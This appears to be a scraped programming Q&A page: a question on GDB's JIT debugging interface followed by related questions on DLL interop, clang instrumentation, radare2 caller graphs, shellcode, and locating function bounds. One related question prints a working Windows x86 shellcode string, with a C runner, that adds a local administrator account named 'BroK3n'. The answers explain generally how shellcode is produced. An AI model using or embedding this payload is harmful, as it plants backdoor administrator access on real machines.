GDB JIT Interface simplest example - C++

I read the JIT Interface chapter and ran into a problem: how do I write the simplest possible example for the simplest possible code (preferably in C++ and at least for the x86-64 platform)? Say I want to debug the following code (namely, the function at code_.data()):
#include "eallocator.hpp"
#include <iostream>
#include <vector>
#include <cstdlib>
int main()
{
std::vector< std::uint8_t, eallocator< std::uint8_t > > code_;
code_.push_back(0b11011001u); code_.push_back(0b11101011u); // fldpi
code_.push_back(0b11000011u); // ret
double result_;
__asm("call *%1"
: "=&t"(result_)
: "r"(code_.data())
:
);
std::cout << result_ << std::endl;
return EXIT_SUCCESS;
}
What (minimally) should I do to use the interface? In particular, I want to be able to provide some pseudocode (arbitrary text in memory) as the "source" (with corresponding line info), if that is possible.
How can I instrument the above code (or something similar) while remaining terse?
#include "eallocator.hpp" should use the approaches from this for Windows or from this for Linux.

If I understand you correctly, what you're trying to do is to dynamically emit some executable code into memory and set up GDB to be able to debug it, is that correct?
What makes this task quite difficult to express in a "minimal" example is that GDB actually expects to find a whole ELF object in memory, not just a lump of code. GDB's registration interfaces need ELF symbol tables to examine in order to figure out which symbols exist in the emitted code and where they reside.
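For reference, the hooks GDB looks for are the ones from the "JIT Compilation Interface" chapter of its manual. Roughly, the JIT-ing process has to expose the following declarations and then hand GDB a complete in-memory ELF object through them (a sketch following the manual; building that ELF image is the hard part, which is why the suggestion below is to let LLVM do it):

#include <stdint.h>

typedef enum {
    JIT_NOACTION = 0,
    JIT_REGISTER_FN,
    JIT_UNREGISTER_FN
} jit_actions_t;

struct jit_code_entry {
    struct jit_code_entry *next_entry;
    struct jit_code_entry *prev_entry;
    const char *symfile_addr;   /* must point at a complete in-memory ELF object */
    uint64_t symfile_size;
};

struct jit_descriptor {
    uint32_t version;                      /* must be 1 */
    uint32_t action_flag;                  /* one of jit_actions_t */
    struct jit_code_entry *relevant_entry;
    struct jit_code_entry *first_entry;
};

/* GDB puts a breakpoint in this function; it must not be inlined or optimized away. */
void __attribute__((noinline)) __jit_debug_register_code(void) { asm(""); }

/* GDB looks this symbol up by name when it attaches. */
struct jit_descriptor __jit_debug_descriptor = { 1, 0, 0, 0 };

To register newly emitted code you fill in a jit_code_entry, link it into the list, point relevant_entry at it, set action_flag to JIT_REGISTER_FN and call __jit_debug_register_code().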
Your best bet to do this without unreasonable effort is to look at LLVM. The Debugging JIT-ed Code with GDB section in the documentation describes how to do this with MCJIT, with a full example at the bottom - going from some simple C code, JITing it to memory with LLVM MCJIT and attaching GDB to it. Moreover, since the LLVM MCJIT framework is involved you get full debug info there, up to the C level!
To be honest, that documentation section has not been updated in a while, but it should work. Let me know if it doesn't - I'll look into fixing things and updating it.
I hope this helps.

There is an example in the GDB test suite which should help:
https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;a=blob;f=gdb/testsuite/gdb.base/jit-main.c

Related

Can I include a DLL generated by GCC in an MSVC project?

I have a library of code I'm working on upgrading from x86 to x64 for a Windows application.
Part of the code took advantage of MSVC inline assembly blocks. I'm not looking to go through and interpret the assembly but I am looking to keep functionality from this part of the application.
Can I compile the functions using the inline assembly using GCC to make a DLL and link that to the rest of the library?
EDIT 1 (7/7/21): The choice of compiler for the project is open, and I am currently looking into using Clang alongside MSVC (the Intel C++ compiler is another possibility). As stated in the first sentence, it is a Windows application that I want to keep on Windows, and the reason for using another compiler is that 1) I don't want to rewrite the large amount of assembly, and 2) I know that MSVC does not support x64 inline assembly. So far Clang seems to be working, apart from a couple of issues with how comments are declared inside the assembly block and a few instructions. The function is built around doing mathematical operations on a block of data, written to be as fast as possible when it was developed; now that it works as intended I'm not looking to upgrade it, just to maintain its functionality. So any compiler that supports inline assembly is an option.
EDIT 2 (7/7/21): I forgot to mention in the first edit that I'm not necessarily looking to load the 32-bit DLL into another process, because I'm worried about copying data into and out of shared memory. I've done a similar solution for another project, but this data set is around 8 MB and I'm worried that slow copy times would cause the time constraint on the math to create issues at runtime (slow, laggy, and buffering are effects I'm trying to avoid). I'm not trying to make it any faster, but it definitely can't get any slower.
In theory, if you manage to create a plain C interface for that DLL (all exported symbols from the DLL are standard C functions) and don't use memory management functions across the "border" (no mixed memory management), then you should be able to dynamically load that DLL from another (MSVC) process and call its functions, at least.
Not sure about statically linking against it... probably not, because the compiler and linker must go hand in hand (MSVC compiler + MSVC linker, or GCC compiler + GCC linker). The output of the GCC linker is probably not compatible with MSVC, at least regarding name mangling.
Here is how I would structure it (without small details):
Header.h (separate header to be included in both DLL and EXE)
//... remember to use your preferred calling convention, but be consistent about it
struct Interface{
    void (*func0)();
    void (*func1)(int);
    //...
};
typedef Interface* (*GetInterface)();
DLL (gcc)
#include "Header.h"
//functions implementing the specific functionality (not exported)
void f0(){/*...*/}
void f1(int){/*...*/}
//...

// exported from the DLL with C linkage so GetProcAddress can find it by its unmangled name
extern "C" __declspec(dllexport) Interface* getInterface(){
    static Interface interface;
    //initialize the function pointers of the interface with the corresponding functions
    interface.func0 = &f0;
    interface.func1 = &f1;
    //...
    return &interface;
}
EXE (MSVC)
#include "Header.h"
int main(){
auto dll = LoadLibrary("DLL.dll");
auto getDllInterface = (GetInstance)GetProcAddress(dll, "getInterface");
auto* dllInterface = getDllInterface();
dllInterface->func0();
dllInterface->func1(123);
//...
return 0;
}

C++ function instrumentation via clang++'s -finstrument-functions: how to ignore internal std library calls?

Let's say I have a function like:
template<typename It, typename Cmp>
void mysort( It begin, It end, Cmp cmp )
{
    std::sort( begin, end, cmp );
}
When I compile this using -finstrument-functions-after-inlining with clang++ (clang++ --version output below):
clang version 11.0.0 (...)
Target: x86_64-unknown-linux-gnu
Thread model: posix
InstalledDir: ...
The instrumentation explodes the execution time, because my entry and exit functions are called for every call of
void std::__introsort_loop<...>(...)
void std::__move_median_to_first<...>(...)
I'm sorting a really big array, so my program doesn't finish: without instrumentation it takes around 10 seconds, with instrumentation I've cancelled it at 10 minutes.
I've tried adding __attribute__((no_instrument_function)) to mysort (and the function that calls mysort), but this doesn't seem to have an effect as far as these standard library calls are concerned.
Does anyone know if it is possible to ignore function instrumentation for the internals of a standard library function like std::sort? Ideally, I would only have mysort instrumented, so a single entry and a single exit!
I see that clang++ sadly does not yet support anything like -finstrument-functions-exclude-function-list or -finstrument-functions-exclude-file-list, but g++ does not yet support -finstrument-functions-after-inlining, which I would ideally have, so I'm stuck!
EDIT: After playing around more, it would appear the effect on execution time is actually less than described above, so this isn't the end of the world.
EDIT2: To further highlight the problem now that I've got it running in a reasonable time frame: the resulting trace that I produce from the instrumented code with those two standard library functions is 15GB. When I hard code my tracing to ignore the two function addresses, the resulting trace is 3.7MB!
I've run into the same problem. It looks like support for these flags was once proposed, but never merged into the main branch.
https://reviews.llvm.org/D37622
This is not a direct answer, since the tool doesn't support what you want to do, but I think I have a decent workaround. What I wound up doing was creating a "skip list" of sorts. In the profiling hooks (__cyg_profile_func_enter and __cyg_profile_func_exit), I would guess the part contributing most to your execution time is the printing. If you can come up with a way of short-circuiting the profile functions, that should help, even if it's not ideal. At the very least it will limit the size of the output file.
Something like
#include <stddef.h>
#include <stdint.h>

uintptr_t skipAddrs[] = {
    // assuming 64-bit addresses
    0x123456789abcdef, 0x2468ace2468ace24
};
size_t arrSize = 0;

int main(void)
{
    ...
    arrSize = sizeof(skipAddrs)/sizeof(skipAddrs[0]);
    // https://stackoverflow.com/a/37539/12940429
    ...
}

void __cyg_profile_func_enter (void *this_fn, void *call_site) {
    for (size_t idx = 0; idx < arrSize; idx++) {
        if ((uintptr_t) this_fn == skipAddrs[idx]) {
            return;
        }
    }
}
I use something like objdump -t binaryFile to examine the symbol table and find what the addresses are for each function.
If you specifically want to ignore library calls, something that might work is examining the symbol table of your object file(s) before linking against libraries, then ignoring all the ones that appear new in the final binary.
All this should be possible with things like grep, awk, or python.
You have to add the attribute __attribute__((no_instrument_function)) to the functions that should not be instrumented. Unfortunately it is not easy to make this work for C/C++ standard library functions, because it would require editing all of the library's functions.
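Applied to a function you control it looks like this (a sketch reusing mysort from the question; as noted there, the attribute does not propagate into the std::sort helpers that mysort calls):

#include <algorithm>

// Only mysort itself is excluded from instrumentation; the instantiated
// std::__introsort_loop and friends are still instrumented.
template<typename It, typename Cmp>
__attribute__((no_instrument_function))
void mysort( It begin, It end, Cmp cmp )
{
    std::sort( begin, end, cmp );
}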
There are some hacks you can do, like redefining existing macros from libc++'s include/__config to add this attribute as well, e.g.:
-D_LIBCPP_INLINE_VISIBILITY=__attribute__((no_instrument_function,internal_linkage))
Make sure to append no_instrument_function to the existing macro definition to avoid unexpected errors.

How to get a caller graph from a given symbol in a binary

This question is related to a question I asked earlier today: I wonder if it's possible to generate a caller graph from a given function (or a symbol name, e.g. taken from nm), even if the function of interest is not part of "my" source code (e.g. it is located in a library, e.g. malloc()).
For example to know where malloc is being used in my program named foo I would first lookup the symbol name:
nm foo | grep malloc
U malloc@@GLIBC_2.2.5
And then run a tool (which might need a specially compiled/linked version of my program or some compiler artifacts):
find_usages foo-with-debug-symbols "malloc@@GLIBC_2.2.5"
Which would generate a (textual) caller graph I can then process further.
Reading this question I found radare2, which seems to accomplish nearly everything you can imagine, but somehow I haven't managed to generate a caller graph from a given symbol yet.
Progress
Using radare2 I've managed to generate a dot caller graph from an executable, but something is still missing. I'm compiling the following C++ program which I'm quite sure has to use malloc() or new:
#include <string>
int main() {
    auto s = std::string("hello");
    s += " welt";
    return 0;
}
I compile it with static libraries in order to be sure all calls I want to analyze can be found in the binary:
g++ foo.cpp -static
By running nm a.out | grep -E "_Znwm|_Znam|_Znwj|_Znaj|_ZdlPv|_ZdaPv|malloc|free" you can see a lot of symbols which are used for memory allocation.
Now I run radare2 on the executable:
r2 -qAc 'agCd' a.out > callgraph.dot
With a little script (inspired by this answer) I'm looking for a call-path from any symbol containing "sym.operatornew" but there seems to be none!
Is there a way to make sure all the information needed to generate a call graph from/to any function that gets called inside that binary is available?
Is there a better way to run radare2? It looks like the different call-graph visualization types provide different information - e.g. the ASCII-art generator provides names for symbols that the dot generator does not, while the dot generator provides much more detail about calls.
In general, you cannot extract an exact control flow graph from a binary, because of the indirect jumps and calls it contains. A machine-code indirect call jumps to the contents of some register, and you cannot reliably enumerate all the values that register could take (doing so can be proven equivalent to the halting problem).
Is there a way to make sure all the information needed to generate a call graph from/to any function that gets called inside that binary is available?
No, and that problem is equivalent to the halting problem, so there will never be a sure way to get that call graph (in a complete and sound way).
The C++ compiler will (usually) generate indirect jumps for virtual function calls (they jump through the vtable), and probably also when calling into a shared library (read Drepper's How To Write Shared Libraries paper for more).
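A minimal illustration of why this defeats a static caller graph (names here are purely illustrative):

// The call below is compiled to an indirect call through the vtable slot,
// so a static scan of the binary cannot tell which override (and hence
// which potential allocation) actually runs.
struct Base { virtual void run() = 0; };
struct Derived : Base { void run() override { /* may allocate */ } };

void invoke(Base& b) { b.run(); }   // roughly: load vtable slot, call *register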
Look into the BINSEC tool (developed by colleagues from CEA, LIST and by INRIA), at least to find references.
If you really want to find most (but not all) dynamic memory allocations in your C++ source code, you might use static source code analysis (like Frama-C or Frama-Clang) and other tools, but they are not a silver bullet.
Remember that allocating functions like malloc or operator new could be stored in function pointers (and your C++ code might have some allocator deeply buried somewhere, in which case you are likely to have indirect calls to malloc).
Maybe you could spend months of effort writing your own GCC plugin to look for calls to malloc after optimizations inside the GCC compiler (but notice that GCC plugins are tied to one particular version of GCC). I am not sure it is worth the effort. My old (obsolete, unmaintained) GCC MELT project was able to find calls to malloc with a size above some given constant. Perhaps in at least a year - end of 2019 or later - my successor project (bismon, funded by the CHARIOT H2020 project) might be mature enough to help you.
Remember also that GCC is capable of quite fancy optimizations related to malloc. Try to compile the following C code
//file mallfree.c
#include <stdlib.h>

int weirdsum(int x, int y) {
    int *ar2 = malloc(2*sizeof(int));
    ar2[0] = x; ar2[1] = y;
    int r = ar2[0] + ar2[1];
    free(ar2);
    return r;
}
with gcc -S -fverbose-asm -O3 mallfree.c. You'll see that the generated mallfree.s assembler file contains no call to malloc or free. Such an optimization is permitted by the as-if rule, and is practically useful for optimizing most usages of C++ standard containers.
So what you want is not simple even for apparently "simple" C++ code (and is impossible in the general case).
If you want to code a GCC plugin and have more than a full year to spend on that issue (or could pay at least 500k€ for that), please contact me. See also
https://xkcd.com/1425/ (your question is a virtually impossible one).
BTW, of course, what you really care about is dynamic memory allocation in optimized code (you really want inlining and dead-code elimination, and GCC does that quite well with -O3 or -O2). When GCC is not optimizing at all (e.g. with -O0, which is the default), it will do a lot of "useless" dynamic memory allocation, especially with C++ code (using the C++ standard library). See also Matt Godbolt's CppCon 2017 talk "What Has My Compiler Done for Me Lately? Unbolting the Compiler's Lid".

How is the shell code of a Buffer Overflow generated

The following code caught my curiosity. I am always looking at, searching for, and studying the exploit known as "buffer overflow". I want to know how the shellcode was generated, and how and why it runs.
char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
"\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a"
"\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf"
"\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f"
"\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69"
"\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63"
"\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"
"\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33"
"\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65"
"\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63"
"\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7";
int main(int argc, char **argv){
    int (*f)();
    f = (int (*)())shellcode;
    (int)(*f)();
}
Thanks a lot, fellas. ^_^
A simple way to generate such code would be to write the desired functionality in C, then compile it (not link it) using, say, gcc as your compiler:
gcc -c shellcode.c
This will generate an object file shellcode.o. Now you can see the assembled code using objdump:
objdump -D shellcode.o
Now you can see the bytes corresponding to the instructions in your function.
Please remember, though, that this will work only if your shellcode doesn't call any other function or reference any globals or strings. That is because the linker has not yet been invoked. If you want all the functionality, I suggest you generate a shared binary (.so on *NIX, DLL on Windows) that exports the required function. Then you can find the start of the function and copy the bytes from there. You will also have to copy the bytes of all other functions and globals it uses, and make sure the shared library is compiled as a position-independent library.
Also, as mentioned above, the generated code is specific to the target and won't work as-is on other platforms.
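As a purely hypothetical illustration of the kind of function the first step needs - no calls to other functions, no globals, no string literals - so that the bytes objdump prints are usable as-is:

/* hypothetical shellcode.c: deliberately self-contained, so the opcode
   bytes shown by objdump -D need no relocation by a linker */
int add_constant(int x)
{
    return x + 42;
}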
Machine code instructions have been entered directly into the C program as data, then called with a function pointer. If the system allows this, the assembly can take any action allowed to the program, including launching other programs.
The code is specific to the particular processor it is targeted at.

Does an arbitrary instruction pointer reside in a specific function?

I have a very difficult problem I'm trying to solve: Let's say I have an arbitrary instruction pointer. I need to find out if that instruction pointer resides in a specific function (let's call it "Foo").
One approach to this would be to try to find the start and ending bounds of the function and see if the IP resides in it. The starting bound is easy to find:
void *start = &Foo;
The problem is, I don't know how to get the ending address of the function (or how "long" the function is, in bytes of assembly).
Does anyone have any ideas how you would get the "length" of a function, or a completely different way of doing this?
Let's assume that there is no SEH or C++ exception handling in the function. Also note that I am on a win32 platform, and have full access to the win32 api.
This won't work. You're presuming functions are contiguous in memory and that one address will map to one function. The optimizer has a lot of leeway here and can move code from functions around the image.
If you have PDB files, you can use something like the dbghelp or DIA APIs to figure this out, for instance SymFromAddr. There may be some ambiguity here, as a single address can map to multiple functions.
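A sketch of what that could look like with dbghelp, assuming the PDB for the module is available (AddressIsInFunction is a made-up helper name):

#include <windows.h>
#include <dbghelp.h>
#include <cstring>
#pragma comment(lib, "dbghelp.lib")

// Returns true if 'ip' falls inside the symbol named 'funcName' according
// to the debug information loaded for the current process.
bool AddressIsInFunction(void* ip, const char* funcName)
{
    HANDLE proc = GetCurrentProcess();
    if (!SymInitialize(proc, nullptr, TRUE))   // TRUE: load symbols for all loaded modules
        return false;

    char buffer[sizeof(SYMBOL_INFO) + MAX_SYM_NAME] = {};
    SYMBOL_INFO* sym = reinterpret_cast<SYMBOL_INFO*>(buffer);
    sym->SizeOfStruct = sizeof(SYMBOL_INFO);
    sym->MaxNameLen = MAX_SYM_NAME;

    DWORD64 displacement = 0;
    bool inside = SymFromAddr(proc, reinterpret_cast<DWORD64>(ip), &displacement, sym)
               && std::strcmp(sym->Name, funcName) == 0;

    SymCleanup(proc);
    return inside;
}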
I've seen code that tries to do this before with something like:
#pragma optimize("", off)
void Foo()
{
}
void FooEnd()
{
}
#pragma optimize("", on)
And then FooEnd-Foo was used to compute the length of function Foo. This approach is incredibly error prone and still makes a lot of assumptions about exactly how the code is generated.
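The containment check built on top of those markers would then be something along these lines (same caveats apply - it assumes the linker kept Foo and FooEnd adjacent and in declaration order):

// Hypothetical test using the Foo/FooEnd markers above.
bool IpInFoo(void* ip)
{
    return ip >= reinterpret_cast<void*>(&Foo)
        && ip <  reinterpret_cast<void*>(&FooEnd);
}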
Look at the *.map file which can optionally be generated by the linker when it links the program, or at the program's debug (*.pdb) file.
OK, I haven't done assembly in about 15 years. Back then, I didn't do very much. Also, it was 680x0 asm. BUT...
Don't you just need to put a label before and after the function, take their addresses, subtract them to get the function length, and then just compare the IP? I've seen the former done. The latter seems obvious.
If you're doing this in C, look first for debugging support --- ChrisW is spot on with map files, but also see if your C compiler's standard library provides anything for this low-level stuff -- most compilers provide tools for analysing the stack etc., for instance, even though it's not standard. Otherwise, try just using inline assembly, or wrapping the C function with an assembly file and an empty wrapper function with those labels.
The simplest solution is to maintain a state variable:
volatile int FOO_is_running = 0;

int Foo( int par ){
    FOO_is_running = 1;
    /* do the work */
    FOO_is_running = 0;
    return 0;
}
Here's how I do it, but it's using gcc/gdb.
$ gdb ImageWithSymbols
gdb> info line * 0xYourEIPhere
Edit: Formatting is giving me fits. Time for another beer.